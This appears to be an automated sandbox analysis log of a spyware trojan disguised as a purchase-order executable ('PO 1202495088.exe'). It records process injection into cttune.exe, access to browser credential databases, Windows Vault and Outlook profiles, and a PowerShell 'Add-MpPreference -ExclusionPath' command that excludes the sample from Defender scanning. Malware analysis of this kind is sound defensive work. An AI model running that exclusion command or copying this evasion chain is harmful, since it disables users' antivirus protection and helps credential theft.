                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8FA8913_2_04A8FA89
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_049EFAA013_2_049EFAA0
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A61B8013_2_04A61B80
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A8FB2E13_2_04A8FB2E
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04A0DB1913_2_04A0DB19
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEEDD613_2_04CEEDD6
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEE5AC13_2_04CEE5AC
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CED67813_2_04CED678
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEE0F813_2_04CEE0F8
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CF50AC13_2_04CF50AC
                Source: C:\Windows\SysWOW64\cttune.exeCode function: 13_2_04CEE21313_2_04CEE213
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_0000020832DEA0F814_2_0000020832DEA0F8
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_0000020832DEA5AC14_2_0000020832DEA5AC
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_0000020832DE967814_2_0000020832DE9678
                Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 14_2_0000020832DEA21314_2_0000020832DEA213
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: String function: 01407BE4 appears 102 times
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: String function: 0143EF10 appears 105 times
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: String function: 013AB910 appears 278 times
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: String function: 0142E692 appears 86 times
                Source: C:\Users\user\Desktop\PO 1202495088.exeCode function: String function: 013F5050 appears 58 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04A05050 appears 58 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 049BB910 appears 274 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04A3E692 appears 86 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04A4EF10 appears 105 times
                Source: C:\Windows\SysWOW64\cttune.exeCode function: String function: 04A17BE4 appears 101 times
                Source: PO 1202495088.exe, 00000001.00000002.1117480110.0000000006EEF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1114762319.00000000042F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuser.dll" vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1121146600.000000006FD8B000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1116911206.0000000005960000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameuser.dll" vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmpBinary or memory string: lastOriginalFileName vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000000.959119660.0000000000DF4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOwbg.exe, vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1112653451.000000000150E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000001.00000002.1118211923.0000000009C00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000004.00000002.1464816482.00000000014AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO 1202495088.exe
                Source: PO 1202495088.exe, 00000004.00000002.1463903866.00000000010D8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCTTUNE.EXEj% vs PO 1202495088.exe
                Source: PO 1202495088.exeBinary or memory string: OriginalFilenameOwbg.exe, vs PO 1202495088.exe
                Source: PO 1202495088.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: PO 1202495088.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, mK0wZ1QMebWlE3QgK5.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, mK0wZ1QMebWlE3QgK5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, mK0wZ1QMebWlE3QgK5.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, uUjTuaEUHvFULjn8cB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, mK0wZ1QMebWlE3QgK5.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, mK0wZ1QMebWlE3QgK5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.PO 1202495088.exe.4da2308.2.raw.unpack, mK0wZ1QMebWlE3QgK5.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, mK0wZ1QMebWlE3QgK5.csSecurity API names: _0020.SetAccessControl
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, mK0wZ1QMebWlE3QgK5.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, mK0wZ1QMebWlE3QgK5.csSecurity API names: _0020.AddAccessRule
                Source: 1.2.PO 1202495088.exe.9c00000.6.raw.unpack, uUjTuaEUHvFULjn8cB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 1.2.PO 1202495088.exe.4e2cd28.3.raw.unpack, uUjTuaEUHvFULjn8cB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/9@18/13
                Source: C:\Users\user\Desktop\PO 1202495088.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO 1202495088.exe.logJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6944:304:WilStaging_02
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_whnjezoi.djl.ps1Jump to behavior
                Source: PO 1202495088.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: PO 1202495088.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\PO 1202495088.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: cttune.exe, 0000000D.00000002.5169500808.0000000007C33000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1644119779.0000000007C2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
                Source: cttune.exe, 0000000D.00000003.1639379127.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000003.1639379127.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5164151299.0000000000A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: cttune.exe, 0000000D.00000003.1647938408.0000000007C8C000.00000004.00000020.00020000.00000000.sdmp, cttune.exe, 0000000D.00000002.5169500808.0000000007C97000.00000004.00000020.00020000.00000000.sdmp, --cG1-69-.13.drBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
                Source: PO 1202495088.exeReversingLabs: Detection: 50%
                Source: unknownProcess created: C:\Users\user\Desktop\PO 1202495088.exe "C:\Users\user\Desktop\PO 1202495088.exe"
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess created: C:\Users\user\Desktop\PO 1202495088.exe "C:\Users\user\Desktop\PO 1202495088.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"
                Source: C:\Windows\SysWOW64\cttune.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeProcess created: C:\Users\user\Desktop\PO 1202495088.exe "C:\Users\user\Desktop\PO 1202495088.exe"Jump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cttune.exe "C:\Windows\SysWOW64\cttune.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: edgegdi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\PO 1202495088.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\PO 1202495088.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cttune.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PO 1202495088.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: PO 1202495088.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: System.Windows.Forms.pdb source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: PO 1202495088.exe, 00000001.00000002.1121146600.00000000708AB000.00000020.00000001.01000000.00000007.sdmp
                Source: Binary string: cttune.pdb source: PO 1202495088.exe, 00000004.00000002.1463903866.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cttune.pdbGCTL source: PO 1202495088.exe, 00000004.00000002.1463903866.00000000010D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Drawing.pdb source: PO 1202495088.exe, 00000001.00000002.1129772033.0000000070A8B000.00000020.00000001.01000000.00000006.sdmp
